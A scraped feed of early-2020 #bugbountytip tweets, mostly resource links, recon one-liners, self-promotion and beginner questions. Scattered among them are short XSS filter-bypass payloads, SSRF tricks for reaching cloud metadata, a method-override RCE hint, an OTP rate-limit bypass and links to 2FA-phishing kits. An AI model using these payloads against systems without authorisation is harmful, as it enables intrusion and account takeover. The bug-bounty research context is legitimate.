7 #bugbounty tips part 2 #hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pentesting #webapptesting #webappsecurity #appsec #hackerone #bugcrowd #bounty #infosec #cybersec #cybersecurity #informationsecurity #hacker #bughunting #bugbountytips https://t.co/4pcPahsC8Z
Your Next Bug Tip
@YourNextBugTip


2020-02-13 08:38:07
1 Reflected XSS on 8x8 Found In 3 minutes by @gkhck_ Recently I have seen lots of people using ARJUN to find hidden parameters. Great Tool by @s0md3v Must Read WriteUp Here(1min read) #bugbounty #bugbountytips #bugbountytip https://t.co/Ga3x3fxeiO
HackDoor
@hackd00r


2020-02-13 04:03:45
0 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/IWvPfE8LgK Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p LinkedIn - https://t.co/Chd0Qii4TT Instagram - https://t.co/1YqKY0ZFK1 Youtube - https://t.co/ovEGR1Is7q #BugBounty #BugBountyTip #pentesting #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-13 04:01:14
0 Resources-for-Beginner-Bug-Bounty-Hunters Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining https://t.co/ZHnkjd1adq
Ammar Amer🇸🇾
@cry__pto


2020-02-13 00:55:20
1 Google Dorking: https://t.co/AoJ94PbopC #OSINT #bugbountytip #Hacking
jdksec
@jdksec


2020-02-13 00:30:14
2 So lost in tmux nested sessions....... ๐Ÿ˜‚ #bugbounty #bugbountytip #hackerone #bugcrowd #allthegearnoidea https://t.co/EeS49RPLEY
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-02-12 21:27:08
1 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/QYXjW7O3xv #BugBounty #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-12 18:00:14
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/3zAyRpdIfd
Evan Custodio
@defparam


2020-02-12 16:56:09
0 If y'all haven't heard about cloud-init, check it out https://t.co/y4S8Gdwqro #bugbountytips #bugbountytip https://t.co/cADixG2ti4
Cryptographer
@crypt0gr4ph3r


2020-02-12 15:51:15
0 Awarded $1,000 bounty of out of scope but very sensitive info disclose. Thanks @NahamSec for this #bugbountytip #bugbounty #hackerone https://t.co/eMGfDHxeGl
siLLyDaDDy
@sillydadddy


2020-02-12 14:02:31
0 #bugbounty #bugbountytip Just finished reading the book "web application hackers handbook ". Still very relevant .Awesome book.Highly recommended for new bug bounty hunters ... I will go back to it again later !!!! Thanks @DafyddStuttard and @MDSecLabs for your hard work !!!
o k t a v a n d i
@0ktavandi


2020-02-12 13:46:03
0 any tips to create 'null' origin? #bugbountytips #bugbountytip
Evan Custodio
@defparam


2020-02-12 13:39:42
1 I know some of you are doing this but, wanna increase your recon game? Create an automation framework on your VPS provider. I went from manual scans to 5-10 droplet workers auto scanning my targets. My recon data to analyze increased 10x. #bugbountytip (insert draw the owl meme)
Darkside
@darksh1d3


2020-02-12 12:07:24
1 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/blPPs3GtWS … #OSWE #bugbountytips #bugbountytip https://t.co/b7dMpByfTW
Ammar Amer🇸🇾
@cry__pto


2020-02-12 07:50:06
1 you can visit this website if you want to see a list of websites that have been hacked before: https://t.co/TMHG53oRIW a very useful free service that offers various DNS, networking, and e-mail analysis tools: https://t.co/7eVKGC0pjK #bugbountytip #hacking #pentest #redteam #OSINT https://t.co/Q1lc0ECSNs
Ammar Amer🇸🇾
@cry__pto


2020-02-12 07:48:02
3 Reverse Image Search: https://t.co/v4L4gqyvJY Google custom search engine: 300+ Social Networking Sites: https://t.co/WbGXl5hOUb street webcams: https://t.co/rxcrybQxsW #bugbountytip #hacking #pentest #redteam #OSINT https://t.co/osHNr287ql
Ammar Amer🇸🇾
@cry__pto


2020-02-12 07:41:59
4 This is the world biggest directory of online surveillance security cameras: https://t.co/IubMc5i95o Simple Twitter Profile Analyzer,Tweets metadata scraper & activity analyzer: https://t.co/M6v3uQ9lll -LinkedIn Contact Extractor: https://t.co/Yh4129EoDE #bugbountytip #OSINT
HackDoor
@hackd00r


2020-02-12 06:07:19
3 AWS Solutions Architect Certification - 2020 AWS IAM Tutorial https://t.co/9GjGq8WS9o #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
GokhanGK
@gkhck_


2020-02-12 05:05:46
7 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/DZ9AyAymfC
Ammar Amer🇸🇾
@cry__pto


2020-02-12 01:28:20
4 I enjoyed reading these books! #bugbountytip #hacking #pentest #bash #Linux https://t.co/pfIXoXwn20
Andrew Roe
@aroe1994


2020-02-12 01:27:45
0 Stream is live with some HackTheBox! Day 1 on my quest to master bug bounties. https://t.co/a2ASaTS2z3 #CyberSec #bugbountytip
The Notorious B.E.E. 🐝
@securibee


2020-02-11 19:09:26
4 Earlier today on @NahamSec Twitch stream someone asked if bug bounty is largely luck based. I replied with the following quote "Absolute Success is Luck. Relative Success is Hard Work." You can read more about it here https://t.co/KhoKqRXqjE #bugbounty #bugbountytip
baluz🔥
@0xbalooz


2020-02-11 18:18:25
0 @OffensiveHunter @santi_lopezz99 will this tweet will be in next @intigriti and @PentesterLand blog as a #bugbountytip
Patrik Fehrenbach🤖
@ITSecurityguard


2020-02-11 18:03:27
34 dear Bug Bounty world: DON'T spend money on ANY paid courses/mentors you'll find online, the information shared there is already public. Learn how to use Google and most importantly learn how to apply your knowledge. THERE ARE NO SECRETS FOR SALE 👈 #bugbounty #bugbountytip
Beatrix_Kiddo
@ki_twyce_


2020-02-11 17:34:54
0 My homeboy @aptSemi taught me about virtual workstations with VMware. It gave me the ability to get some experience in a linux environment. He also taught me about SQL injection and a few other things, and no I haven't done it yet 👀😂 but I'm grateful for the #bugbountytip https://t.co/B76nNVp2hf
Your Next Bug Tip
@YourNextBugTip


2020-02-11 16:24:50
0 @santi_lopezz99 So thats why instead of naming the title you just sold @OffensiveHunter's content, Great Tip #bugbountytips #bugbountytip #bugbounty
but most of all, samy is my hero
@SecGus


2020-02-11 15:24:42
1 #bugbountytip If you find an Open Redirect, check for Reflected / DOM based XSS, sometimes it is just a case of local JS updating the DOM to redirect to whatever parameter you included, and other times the parameters contents is directly inserted into window.location.href.
Arif Khan
@payloadartist


2020-02-11 14:57:00
1 Amazing handy cheatsheets for mobile #security testing! #bugbounty #bugbountytip https://t.co/va8IVbdNjC
bughuntercat
@bughuntercat


2020-02-11 14:17:42
0 #bugbountytip Don't be gossip or envious of who knows or has more than you. Better strive to learn for yourself and don't try to steal someone else's effort as if you were a vulture.
Dominik Małowiecki
@5up3rD43m0n


2020-02-11 12:23:35
0 Dear hackers when testing for XSS and trying to include remote js file, please don't forget to upgrade your SSL certificate. #LoL #bugbountytip https://t.co/voWmkahw4x
HackDoor
@hackd00r


2020-02-11 11:25:43
1 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script https://t.co/tRFLvb0ep1 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-11 11:25:23
1 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script https://t.co/0gfcgW7uTM #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Pranav Hivarekar
@HivarekarPranav


2020-02-11 05:56:18
1 Blind XSS write ups: 1] https://t.co/eWtYmGPgaL 2] https://t.co/yNGKoJnlZY 3] https://t.co/WLZhTHgBYt #bugbounty #bugbountytip
Hussein Daher
@HusseiN98D


2020-02-10 21:39:29
1 The best #bugbountytip I can give is not to diversify much with tools that do the same work. Test all tools which are for one task and keep the best. You'll gain more in speed and less headache
healthyoutlet
@healthyoutlet


2020-02-10 20:19:38
1 want to know if a hash that was recently generated is actually a timestamp? for i in $(seq $($(echo date +%s)-1000|bc) $($(echo date +%s)+1000|bc)); do echo $i | sha256sum; done | grep YOURHASH #bugbountytip
Doug Little Jr
@douglittlejr


2020-02-10 19:36:00
0 @LindseyGrahamSC @JudgeJeanine @seanhannity @LindseyGrahamSC, been doing #Cybersecurity bout as long as you've been doing legislating. What you did to be doing what you are doing now? Younger days possessed less self control, would be deep diving every #bigdata known 2 know. Heads up, @GOP a #bugbountytip buyer & seller https://t.co/xdb5QaRPcd
Udit Bhadauria
@udit_thakkur


2020-02-10 14:41:12
0 Weird rate_limit bypass: #bugbountytip #bypass #infosec Reported rate limit on OTP sms. Company fixed the issue. To bypass: Capture the request. Remove the country code +91 to [ ] Modify the number from xxxxx-xxxxx to +91 xxxxx-xxxxx Bypass successful. 😂😂
siLLyDaDDy
@sillydadddy


2020-02-10 13:24:35
0 How long it did take for you to get your first triage , after you started bug bounty hunting ? .please RT. #bugbounty #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-10 11:02:48
0 Is there any platform that provide CTFs for latest CVEs, so we can learn from them? Do @PentesterLab @hackthebox_eu have something like that? #bugbounty #bugbountytips #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2020-02-10 09:15:01
0 #bugbountytip #nmap Extract subdomains from IP range. nmap IP_range | grep "domain" | awk '{print $5}' Example for bitdefender https://t.co/5IY0ieaOWZ
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-10 08:35:46
0 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten https://t.co/0wdvBhdOHw #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:35:08
0 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten https://t.co/EBV0NpKxBQ #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:33:11
0 StrandHogg Bug - Unpatched Android OS Vulnerability https://t.co/HlOcn2eebr #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:31:45
13 Easy Subdomain Enumeration Using Censys For Bug Bounty https://t.co/xdWLzfLtCf #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:26:56
0 #bugbountyTip : Find Hidden HTTP headers and inject them, this is a simple way to reach HIGH RISK security bugs ! Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/lb0uyl3k4p #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #devsecops #cybersecurity
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-10 08:26:39
2 #bugbountyTip : Find Hidden HTTP headers and inject them, this is a simple way to reach HIGH RISK security bugs ! Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #devsecops #cybersecurity
HackDoor
@hackd00r


2020-02-10 06:03:31
0 Machine Learning With Python https://t.co/xgVzOtztBU Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
IAM Platform
@IAM__Network


2020-02-09 21:43:54
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
Mohammed Israil 🇮🇳
@mdisrail2468


2020-02-09 19:44:57
2 :-: If your target site having the RSS Feed turn ON, go to https://t.co/KdPwakGJNm, and search for the `generator` tag and you may find the current WordPress version being used for potentially developing the further testings steps. #bugbounty #bugbountytip
AEMSecurity
@AEMSecurity


2020-02-09 19:27:57
1 [+] #BugbountyTip: CVE-2016-0956 - Apache Sling Core Framework Information Disclosure Vulnerability <-- You can still find many vulnerable AEM Instances (free to contact me if you need help understanding this one) #Bugbounty #TogetherWeHitHarder #BugBountyTip https://t.co/xmM8vLXCDT
Bogdan Bodishtyanu
@xalerafera


2020-02-09 19:21:16
0 If the attacked application blocks (" ") characters, then try using quotes instead of them) This will help you bypass the protection. <script>alert`1`</script> #bugbounty #bugbountytips #bugbountytip #hackerone https://t.co/2sAlUOjJOl
HackIsOn ®
@hackison


2020-02-09 17:14:13
4 OSINT tools usage #osint #hacking #hackison #owasp #cybersecurity #linux #bugbounty #bugbountytip #bugbountytips #pentesting #vapt #wapt #CloudComputing #dataprivacy #GDPR #databreach #hacker https://t.co/3iqmOOZe9w
Nikhil Mahajan
@mahajan344


2020-02-09 16:44:54
0 Want to do static analysis of Android apps not sure how to get APK file, use following mirror website to download current/historical version of the app to find API end-points, hardcoded token, keys. #AndroidHackingMonth on @Hacker0x01 #bugbountytip #AndroidSecurity https://t.co/ko9uimIktc
Nikhil Mahajan
@mahajan344


2020-02-09 15:37:25
1 Found a firebase API key in the Android app, not sure what to do? use Pyrebase, A simple python wrapper for the Firebase API to test Authentication, DB and storage permissions. https://t.co/02ynuPy1tO #AndroidHackingMonth on @Hacker0x01 #bugbountytip
mohsin khan
@mohsink83789226


2020-02-09 12:27:10
0 HELP ?callback=something return something({"status": "failure", "code": 1, "data": "Missing required field 'scope'", "message": "Invalid parameters."}) how to exploit. #JSONP #CSP #bugbounty #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-02-09 07:44:00
0 get Bounty or get Experience 10 Facts about #BugBounty @akita_zen @ArbazKiraak https://t.co/Iderxl5Iai #bugbountytips #bugbountytip
IAM Platform
@IAM__Network


2020-02-09 07:35:30
1 IAM Platform Curated Retweet: Via: https://t.co/FPuuLisgvS #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
HackIsOn ®
@hackison


2020-02-09 03:59:48
1 #owasp mobile top 10 where to look them #hacking #hackison #bugbountytip #bugbounty #bugbountytips #cybersecurity #vapt #wapt #mapt #pentesting #redteam https://t.co/BlhtVxHN5i
AEMSecurity
@AEMSecurity


2020-02-08 17:50:32
3 [+] #BugbountyTip: If you come across /api.json in any AEM instance during bug hunting, try for web cache poisoning via following headers: Host: , X-Forwarded-Server , X-Forwarded-Host and or simply try https://localhost/api.json HTTP/1.1 #Bugbounty #TogetherWeHitHarder
IAM Platform
@IAM__Network


2020-02-08 16:44:29
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
Ammar Amer🇸🇾
@cry__pto


2020-02-08 14:26:12
3 different 2FA bypasses: evilginx:https://t.co/9haUXdvpV1 CredSniper:https://t.co/mFTPZYg8xY ReelPhish:https://t.co/FXtzjwgCYG Modlishka:https://t.co/mHNvbvYzF7 #pentest #hacking #phishing #redteam #bugbountytip
thehackerlab.io - jdksec.com
@jdksec


2020-02-08 13:58:16
0 Love it when a good script works first time 😂 #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/X6WRgIpWNZ
Your Next Bug Tip
@YourNextBug


2020-02-08 12:23:18
0 Read the comments for tips #bugbountytips #bugbountytip https://t.co/2ASOZQuLtA
STÖK
@stokfredrik


2020-02-08 10:04:58
5 @Zombiehelp54 wrote this great writeup on Exploiting Out Of Band XXE using internal network and php wrappers. Check it out! loved it! https://t.co/eTCHK7RvHM #bugbounty #bugbountytip #infosec #pentest #hacking
Your Next Bug Tip
@YourNextBug


2020-02-08 05:57:26
0 How many vulnerabilities you to check to find a valid one? #bugbountytips #bugbountytip #bugbounty
𝚛 𝚎 𝚣 𝟶
@rez0__


2020-02-08 04:43:49
0 Since I'm nearing 1k followers... [Easily automate bug bounty alerting] I just posted a blog post all about it. Shout outs to @TomNomNom and findomain in it! https://t.co/wgmOENFxm1 #bugbountytips #bugbountytip ;) #rootgoat2020 @InsiderPhD @Edu4rdSHL #bugbounty https://t.co/zwSyop4naW
IAM Platform
@IAM__Network


2020-02-08 02:18:04
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
ghostlulz
@ghostlulz1337


2020-02-07 22:02:20
5 XSS payload blocked by your targets content security policy (CSP)? You know you can bypass the CSP with some simple techniques? Easy wins! More info on my blog: https://t.co/LqWudgPJ50 #BugBounty #bugbountytips #bugbountytip #infosec #csp #dfir #redteam #pentest #xss #appsec https://t.co/sG0TzZMhmB
offensive
@offensi74555475


2020-02-07 03:01:51
0 If you have checklist you improve what? You have back up so you can pick it easily Save your time of recalling your engagement, it's impossible if you relied on recalling info from your memory. tell me about your checklist let's share the knowledge!! #bugbountytip #infosec
offensive
@offensi74555475


2020-02-07 02:48:34
0 Having a checklist is a great way to provide some consistency to your testing.. do you have checklist? #bugbountytip #infosec #bughunt
thehackerlab.io - jdk
@the_hacker_lab


2020-02-06 22:29:45
2 Oneliner to get all status codes, size,url and redirect url with a ',' as a delimiter: cat webservers.txt | parallel -j50 -q curl -w 'Status:%{http_code},Size:%{size_download},%{url_effective},%{redirect_url}\n' -o /dev/null -sk #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/FQYcm6U9Is
thehackerlab.io - jdk
@the_hacker_lab


2020-02-06 22:24:18
0 Oneliner to get all Http Titles (if they exist) for i in $(cat Webservers.txt ); do echo "$i | $(curl --connect-timeout 0.5 $i -so - | grep -iPo '(?<=<title>)(.*)(?=</title>)')"; done | tee -a titles.txt #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/X4O63pHYhz
Nick || hunt4p1zza
@ngkogkos


2020-02-06 19:45:59
3 When an org is heavily using SSO: 1. Create a browser instance and login w/ all self-registered accounts. 2. Browse to all assets you are aware of ("Open Multiple URLs" plugin). You never know where you may end up logged in due to SSO misconfiguration. #bugbounty #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-06 18:59:24
0 #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to @Zigoo0 #bugbounty #infosec #informationsecurity https://t.co/h1spj3muxs
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-06 16:41:13
0 Hackdoor Corporate Training #GetCertifiedWithHackdoor Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OOUY72a4aE
Ammar Amer🇸🇾
@cry__pto


2020-02-06 14:56:00
2 Find web directories without bruteforce: https://t.co/YaIRwKnrau Abusing Certificate Transparency logs for getting HTTPS websites subdomains.: https://t.co/7mq5XiIeuv the most complete OSINT collection and reconnaissance tool: https://t.co/0uNdRKFInX #bugbountytip #Hacking
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-06 12:33:43
0 When Hackdoor Does #CoporateTrainings in Style 🤖🤖 #Swag and #Sticker Distribution Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity https://t.co/k1CDcrafMP
Keshav Malik
@g0t_rOoT_


2020-02-06 10:43:15
3 Hey Hunters 😄 Here's my First Write-up on Medium regarding an Unexpected Bounty . Do give it a read. Suggestions are welcomed ! 💯 #bugbounty #bugbountytip #bugcrowd #hackerone #responsibledisclosure https://t.co/ZF0IXHsDL6
Grzegorz Niedziela
@gregxsunday


2020-02-06 06:39:45
0 @PaulosYibelo @Random_Robbie @MrTuxracer shodan download --limit=100000 outfile query shodan parse --fields=ip_str,port,https://t.co/qnzC7dYu8m,org,domains,hostnames --separator=";" outfile.json.gz > outfile.json 2/2 #bugbountytip
Grzegorz Niedziela
@gregxsunday


2020-02-06 06:38:48
0 @PaulosYibelo @Random_Robbie @MrTuxracer On https, use ssl certificate information. It will show you the organization the cert was issued to. From my experience, this is the most reliable way of identifying IP. Moreover, use shodan fields like org, domains, hostnames. 1/2 #bugbountytip
Sunil Kumar Singh
@0xsunil


2020-02-06 06:18:48
0 @sshell_ Please use hashtags like #bugbounty #bugbountytip #bugbountytips to reach out more people. It becomes easier for people to know. Thanks for the tip anyway.
INTIGRITI
@intigriti


2020-02-05 19:53:52
1 How to Pwn A Pwned Citrix? Is it possible to upgrade your recon with the @discordapp and tweeted @jobertabma the best #bugbountytip of the week? All of these answers are available in the latest edition of our #BugBytes! #bugbounty 👇👇👇 https://t.co/0Qcq2tBBQo
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-05 18:53:20
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Jd9xcmmcvp
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2020-02-05 17:43:11
1 ➺ Load trial continues, a marvelous load everything is forgotten. Stay with me, checkmate.. ✮ #BugBounty #BugBountyTip #WAF #infosec https://t.co/nsPRzexTE3
◾
@saurinn_


2020-02-05 13:12:21
0 Excellent methodology and so well explained #bugbountytip #fuzzing https://t.co/Jt66YL8HQV
Yadhavi
@PrincessYadhavi


2020-02-04 21:16:50
0 I have put ssh key in settings. but when SSHed to gitlab after login welcome message, session closed immediately. Why happening this? How to solve this? #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2020-02-04 20:40:50
2 Found a gitlab instance with register enabled. after logged in it looks really empty. how to escalate the severity? How to get code execution? And how to find gitlab version? #bugbountytips #bugbounty #bugbountytip
BlackClover
@Bc10ver


2020-02-04 12:10:55
0 Top story: @TakSec: 'XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #b… https://t.co/08qZGtvhUZ, see more https://t.co/fVnXn9Z0FJ
dawgyg
@thedawgyg


2020-02-04 04:18:15
33 When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
m0z
@LooseSecurity


2020-02-03 22:42:37
1 Repost of a #XSS payload I posted before without any parenthesis after "prompt"! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
dawgyg
@thedawgyg


2020-02-03 21:51:04
13 When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past. #bugbountytip #bugbountytip #bugbounty
Mike Takahashi
@TakSec


2020-02-03 20:01:52
10 XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic https://t.co/ltjUpiL4Cu
Nick || hunt4p1zza
@ngkogkos


2020-02-03 18:22:10
0 Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use @TomNomNom's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}' #bugbountytip #bugbounty
kassih mouhssine
@KassihMouhssine


2020-02-03 17:18:36
0 hey anyone here targeted AT&T, if AT&T make my report triaged that's mean my report accepted 100% or not ? #BugBounty #bugbountytips #bugbountytip
Inti De Ceukelaire
@securinti


2020-02-03 16:45:39
0 @seanmeals Next time add #BugBountyTip to your post to get maximum profit
dark_warlord14
@dark_warlord14


2020-02-03 13:01:41
2 #bugbountytip #bugbountytips Never underestimate the power of Google Dorking. Just found a defaced website for bugbounty program. https://t.co/M3kEwoNDtI
Rafin Rahman Chy
@rafinrahmanchy


2020-02-03 11:20:45
3 Bug Bounty Hunting Methodology(Personal Made) #BugBounty #bugbountytip #bugbountytips #websecurity #webhacking #netsec #appsec #Recon #pentest #pentester #Pentesting #Hacking #Hacker #EthicalHacking #EthicalHacker #whitehathacker #InfoSec #InfoSecurity #ITSecurity #CyberSecurity https://t.co/yNmFJJeivP
Hyker Security
@hykersecurity


2020-02-02 20:00:41
2 Cyber Security News Flash by @hykersec @HusseiN98D: 'WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were … https://t.co/JHa7zDItBt, see more https://t.co/nF4yR9PGZj
setec:astronomy
@infowaropcenter


2020-02-02 18:42:04
0 Top story's from my Newspaper @HusseiN98D: 'WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not menti… https://t.co/N5BsQh0yO4, see more https://t.co/OzpGs17X9M
Your Next Bug Tip
@YourNextBug


2020-02-02 14:48:28
0 BLH - Broken Link Hijacking Just suppose Ur site uses cool.c/Script.js After few year cool.c decided to close it services. Now story begins 😈 buys cool.c and then host Script.js BOoOM This happened to Linkedin READ BELOW #bugbountytips #bugbountytip #bugbounty https://t.co/isLO5QMG0w
𝚛 𝚎 𝚣 𝟶
@rez0__


2020-02-02 13:02:27
0 Thanks for the awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip
Hussein Daher
@HusseiN98D


2020-02-02 12:48:15
15 WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not mentioned. RT, Like and Comments are appreciated. For any pentest work DM me:) 🎉🎉 https://t.co/nlAv4pMPhx
ｙｏｄｈｈａ
@y0dhha


2020-02-02 12:32:58
0 Reflected XSS https://t.co/TNZFocIB07 https://t.co/qxizmngi1Y https://t.co/qkg2tCZPJt https://t.co/tDIISt8s5o https://t.co/fywnUUvRJ8 https://t.co/rR1eG6xktM https://t.co/HBCDQ9WLS4 https://t.co/Kn5J7zoqKF https://t.co/zvsERH62Ok https://t.co/01CJDlehsT #bugbounty #bugbountytip
𝚛 𝚎 𝚣 𝟶
@rez0__


2020-02-02 12:31:36
0 Thanks for awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip https://t.co/MmkseVcmLQ
Sunil
@Sunilkande1137


2020-02-02 03:17:45
5 240+ good hacking resources at one place. https://t.co/Iab3Gg7Gyb #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-02-01 06:56:52
0 Haha, as expected no one is sharing, Ok then Share the worst external bug bounty program, at least it will save other's time. 😉 #bugbounty #bugbountytip #BugBountyTips https://t.co/UG7ktzJX40
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-01 05:00:34
0 Watch Out for Coronavirus Phishing Scams https://t.co/B4yqri19tw Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Ammar Amer🇸🇾
@cry__pto


2020-02-01 02:11:54
4 #OSINT : Better Whois:https://t.co/zqCvzqzJyy Active Whois:https://t.co/KtnxHQw6WZ ZabaSearch:https://t.co/5JhzsgJad3 TinEye:https://t.co/XCcelTU0ox isearch:https://t.co/03W18bTDhL serversniff:https://t.co/RTccIDZOJj robtex:https://t.co/xDzAcSX3iO #BugBountyTip #Hacking #pentest
Byron Smith
@MainframeGuyBS


2020-01-31 19:23:33
0 Look what I found on @LinkedIn ๐Ÿ˜Ž Have fun my friends, BUG OUT. #CyberSecurity #Security #BugBountyTip #bugbountytips #Hackers #SecurityResearcher #TheCyberSecurityHub https://t.co/8oCpnkRIly
Joe Doran
@TheRealJoeDoran


2020-01-31 18:54:09
0 What mind mapping software do you use for large scope pentests? I think I’ve outgrown plain text files. #Pentesting #BugBountyTip
Your Next Bug Tip
@YourNextBug


2020-01-31 16:40:47
3 Any good external bug bounty program? #bugbounty #bugbountytips #bugbountytip
AK
@theanonymouscub


2020-01-31 15:43:10
